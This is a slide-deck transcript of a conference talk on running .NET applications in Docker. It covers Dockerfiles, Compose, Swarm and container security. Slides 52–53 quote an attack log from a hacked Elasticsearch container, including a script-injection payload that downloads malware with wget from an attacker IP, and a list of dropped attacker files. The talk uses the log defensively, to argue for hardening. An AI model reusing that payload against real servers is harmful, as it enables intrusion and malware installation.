Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Running .NET on Docker

384 views

Published on

Presented at Confoo 2017, Montreal, Canada on 9th March 2017.

Published in: Technology
  • Login to see the comments

  • Be the first to like this

Running .NET on Docker

  1. 1. Running .NET on Docker @Ben_Hall Ben@BenHall.me.uk Ocelot Uproar / Katacoda.com
  2. 2. Running .NET on Docker @Ben_Hall Ben@BenHall.me.uk Ocelot Uproar / Katacoda.com
  3. 3. @Ben_Hall / Blog.BenHall.me.uk WHOAMI?
  4. 4. Learn via Interactive Browser-Based Labs Katacoda.com
  5. 5. Agenda • Getting started with Docker • Windows Containers vs Linux Containers • Building .NET applications as containers • Deploying containers • The future
  6. 6. doger.io
  7. 7. https://www.docker.com/whatisdocker/ Container
  8. 8. Own Process Space Own Network Interface Own Root Directories Sandboxed Like a lightweight VM. But it’s not a VM. Container
  9. 9. Native CPU Native Memory Native IO No Pre-Allocation No Performance Overheard Container
  10. 10. Milliseconds to launch
  11. 11. Docker - An open platform for distributed applications for developers and sysadmins.
  12. 12. Got us to agree on something!
  13. 13. Batteries included but removable
  14. 14. > docker run –p 6379:6379 redis:3.0.3 _.-``__ ''-._ _.-`` `. `_. ''-._ Redis 3.0.3 (00000000/0) 64 bit .-`` .-```. ```/ _.,_ ''-._ ( ' , .-` | `, ) Running in standalone mode |`-._`-...-` __...-.``-._|'` _.-'| Port: 6379 | `-._ `._ / _.-' | PID: 1 `-._ `-._ `-./ _.-' _.-' |`-._`-._ `-.__.-' _.-'_.-'| | `-._`-._ _.-'_.-' | http://redis.io `-._ `-._`-.__.-'_.-' _.-' |`-._`-._ `-.__.-' _.-'_.-'| | `-._`-._ _.-'_.-' | `-._ `-._`-.__.-'_.-' _.-' `-._ `-.__.-' _.-' `-._ _.-' `-.__.-' 1:M 05 Nov 10:42:24.402 # Server started, Redis version 3.0.3 1:M 05 Nov 10:42:24.402 # WARNING overcommit_memory is set to 0! Background save may fail under low memory condition. To fix this issue add 'vm.overcommit_memory = 1' to /etc/sysctl.conf and then reboot or run the command 'sysctl vm.overcommit_memory=1' for this to take effect. 1:M 05 Nov 10:42:24.402 # WARNING you have Transparent Huge Pages (THP) support enabled in your kernel. This will create latency and memory usage issues with Redis. To fix this issue run the command 'echo never > /sys/kernel/mm/transparent_hugepage/enabled' as root, and add it to your /etc/rc.local in order to retain the setting after a reboot. Redis must be restarted after THP is disabled. 1:M 05 Nov 10:42:24.403 # WARNING: The TCP backlog setting of 511 cannot be enforced because /proc/sys/net/core/somaxconn is set to the lower value of 128. 1:M 05 Nov 10:42:24.403 * The server is now ready to accept connections on port 6379
  15. 15. Installing on OSX / Windows https://www.docker.com/getdocker
  16. 16. Installing In Production 'curl -sSL https://get.docker.com/ | sh'
  17. 17. Very Simple Host A computer station that runs docker daemon
  18. 18. Windows Containers, Linux Containers
  19. 19. Kernel Virtualisation
  20. 20. Base Image
  21. 21. Linux Containers • Centos, Ubuntu, Alpine • Binaries built for Linux kernel
  22. 22. Windows Containers • Windows Server Core, Windows Nano • Binaries built for Windows
  23. 23. Building Docker Containers
  24. 24. https://www.katacoda.com/courses/dotnet-in- docker/deploying-aspnet-core-as-docker-container
  25. 25. $ cat Dockerfile-linux FROM microsoft/dotnet:1.0.0-preview2-sdk
  26. 26. $ cat Dockerfile-linux FROM microsoft/dotnet:1.0.0-preview2-sdk RUN mkdir /app WORKDIR /app COPY project.json /app RUN ["dotnet", "restore"]
  27. 27. $ cat Dockerfile-linux FROM microsoft/dotnet:1.0.0-preview2-sdk RUN mkdir /app WORKDIR /app COPY project.json /app RUN ["dotnet", "restore"] COPY . /app RUN ["dotnet", "build"]
  28. 28. $ cat Dockerfile-linux FROM microsoft/dotnet:1.0.0-preview2-sdk RUN mkdir /app WORKDIR /app COPY project.json /app RUN ["dotnet", "restore"] COPY . /app RUN ["dotnet", "build"] EXPOSE 5000/tcp CMD ["dotnet", "run"]
  29. 29. $ docker build -t aspnet-app:v0.1 . $ docker run -d -t -p 5000:5000 --name app aspnet-app:v0.1
  30. 30. $ type Dockerfile-windows FROM microsoft/iis:windowsservercore-10.0.14393.693
  31. 31. $ type Dockerfile-windows FROM microsoft/iis:windowsservercore-10.0.14393.693 SHELL ["powershell", "-command“]
  32. 32. RUN Install-WindowsFeature NET-Framework-45-ASPNET; Install-WindowsFeature Web-Asp-Net45
  33. 33. RUN Remove-Website -Name 'Default Web Site'; mkdir c:NerdDinner; New-Website -Name 'nerd-dinner' -Port 80 -PhysicalPath 'c:NerdDinner' -ApplicationPool '.NET v4.5‘
  34. 34. COPY NerdDinner c:NerdDinner
  35. 35. $ type Dockerfile-windows FROM microsoft/iis:windowsservercore-10.0.14393.693 SHELL ["powershell", "-command"] RUN Install-WindowsFeature NET-Framework-45-ASPNET; Install- WindowsFeature Web-Asp-Net45 RUN Remove-Website -Name 'Default Web Site'; mkdir c:NerdDinner; New-Website -Name 'nerd-dinner' -Port 80 -PhysicalPath 'c:NerdDinner' -ApplicationPool '.NET v4.5‘ EXPOSE 80 COPY NerdDinner c:NerdDinner
  36. 36. > cat Dockerfile FROM node:6 RUN mkdir -p /usr/src/app WORKDIR /usr/src/app COPY . /usr/src/app RUN npm install CMD [ "npm", "start" ] > docker build –t nodeapp . > docker run –d –p 3000 nodeapp
  37. 37. Visual Studio Integration
  38. 38. Debugging Node.js with VS Code EXPOSE 3000 EXPOSE 5858 CMD ["node", "--debug=5858","index.js"] docker run -d -p 3000:3000 -p 5858:5858 nodeapp
  39. 39. Docker in Production
  40. 40. Containers can’t fix broken architectures. But they can help…
  41. 41. Production isn’t special Just another environment
  42. 42. Immutable Disposable Container Pattern
  43. 43. Docker Compose
  44. 44. > docker-compose up -d > cat docker-compose.yml web: image: ocelotuproar/katacoda volumes: - /opt/projects/katacoda/data:/usr/src/app/data - /opt/docker/katacoda/db:/usr/src/app/ocelite-db - /var/run/docker.sock:/var/run/docker.sock ports: - 3000 environment: VIRTUAL_HOST: 'katacoda.com,*.katacoda.com' NODE_ENV: 'production’ restart: always // Production version of docker-compose-dev.yml
  45. 45. > docker-compose up # Start containers –d # In background Recreating katacoda_nginx_1... Recreating katacoda_redis_1... Recreating katacoda_db_1... Recreating katacoda_elasticsearch_1... Recreating katacoda_web_1… > docker-compose stop # Stop containers Stopping katacoda_web_1... Stopping katacoda_elasticsearch_1... Stopping katacoda_db_1... Stopping katacoda_redis_1... Stopping katacoda_nginx_1...
  46. 46. Swarm
  47. 47. • https://www.katacoda.com/courses/docker- orchestration/ $ docker service create --name http --network skynet --replicas 2 -p 80:80 katacoda/docker-http-server
  48. 48. Constraint Scheduler $ docker run -e constraint:ostypelabel==windowscompat windowservercore cmd $ docker run -e constraint:ostypelabel==linuxcompat ubuntu bash
  49. 49. Microsoft, Apprenda, Red Hat https://github.com/kubernetes/kubernetes/issues/22623
  50. 50. Common Question: Is it secure?
  51. 51. Hosting provider becomes unhappy
  52. 52. org.elasticsearch.search.SearchParseException: [index][3]: query[ConstantScore(*:*)],from[-1],size[1]: Parse Failure [Failed to parse source [{"size":1,"query":{"filtered":{"query":{"match_all":{}}}},"script_fields":{"exp":{"s cript":"import java.util.*;nimport java.io.*;nString str = "";BufferedReader br = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec("wget -O /tmp/xdvi http://<IP Address>:9985/xdvi").getInputStream()));StringBuilder sb = new StringBuilder();while((str=br.readLine())!=null){sb.append(str);}sb.toString();" }}}]] http://blog.benhall.me.uk/2015/09/what-happens-when-an-elasticsearch-container-is-hacked/
  53. 53. C /bin C /bin/netstat C /bin/ps C /bin/ss C /etc C /etc/init.d A /etc/init.d/DbSecuritySpt A /etc/init.d/selinux C /etc/rc1.d A /etc/rc1.d/S97DbSecuritySpt A /etc/rc1.d/S99selinux C /etc/rc2.d A /etc/rc2.d/S97DbSecuritySpt A /etc/rc2.d/S99selinux C /etc/rc3.d A /etc/rc3.d/S97DbSecuritySpt A /etc/rc3.d/S99selinux C /etc/rc4.d A /etc/rc4.d/S97DbSecuritySpt A /etc/rc4.d/S99selinux C /etc/rc5.d http://blog.benhall.me.uk/2015/09/what-happens-when-an-elasticsearch-container-is-hacked/ A /etc/rc5.d/S97DbSecuritySpt A /etc/rc5.d/S99selinux C /etc/ssh A /etc/ssh/bfgffa A /os6 A /safe64 C /tmp A /tmp/.Mm2 A /tmp/64 A /tmp/6Sxx A /tmp/6Ubb A /tmp/DDos99 A /tmp/cmd.n A /tmp/conf.n A /tmp/ddos8 A /tmp/dp25 A /tmp/frcc A /tmp/gates.lod A /tmp/hkddos A /tmp/hsperfdata_root A /tmp/linux32 A /tmp/linux64 A /tmp/manager A /tmp/moni.lod A /tmp/nb A /tmp/o32 A /tmp/oba A /tmp/okml A /tmp/oni A /tmp/yn25 C /usr C /usr/bin A /usr/bin/.sshd A /usr/bin/dpkgd A /usr/bin/dpkgd/netstat A /usr/bin/dpkgd/ps A /usr/bin/dpkgd/ss
  54. 54. Read Only Containers > docker run –-read-only –v /data:/data elasticsearch
  55. 55. Is Docker Secure? • Yes. It’s as secure as your practices are. • ElasticSearch hack would have taken over entire box • New game, new rules to play by
  56. 56. Your local machine is now the same as production
  57. 57. The Future?
  58. 58. Docker + Windows
  59. 59. Microsoft
  60. 60. SQL Server as a Container
  61. 61. Visual Studio as a Container?
  62. 62. RStudio • docker run -d -p 8787:8787 rocker/rstudio
  63. 63. Docker + Desktop Applications https://blog.jessfraz.com/post/doc ker-containers-on-the-desktop/
  64. 64. It’s amazing, but a little confusing. $ docker run -it -v /etc/localtime:/etc/localtime -v /tmp/.X11-unix:/tmp/.X11-unix -e DISPLAY=unix$DISPLAY --device /dev/snd --link pulseaudio:pulseaudio -e PULSE_SERVER=pulseaudio --device /dev/video0 --name skype jess/skype
  65. 65. It’s amazing, but a little confusing. $ docker run -it -v /etc/localtime:/etc/localtime -v /tmp/.X11-unix:/tmp/.X11-unix -e DISPLAY=unix$DISPLAY --device /dev/snd --link pulseaudio:pulseaudio -e PULSE_SERVER=pulseaudio --device /dev/video0 --name skype jess/skype
  66. 66. http://www.katacoda.com/
  67. 67. @Ben_Hall Ben@BenHall.me.uk Blog.BenHall.me.uk www.Katacoda.com

×